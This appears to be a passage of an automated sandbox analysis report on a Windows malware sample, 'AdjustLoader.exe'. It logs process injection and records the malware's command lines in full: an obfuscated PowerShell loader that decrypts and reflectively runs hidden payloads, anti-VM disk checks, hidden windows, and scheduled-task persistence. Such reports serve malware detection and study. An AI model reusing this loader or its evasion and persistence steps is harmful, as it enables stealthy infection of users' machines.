Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3EC0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\users\user\appdata\local\temp\tmp6432.tmp.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex 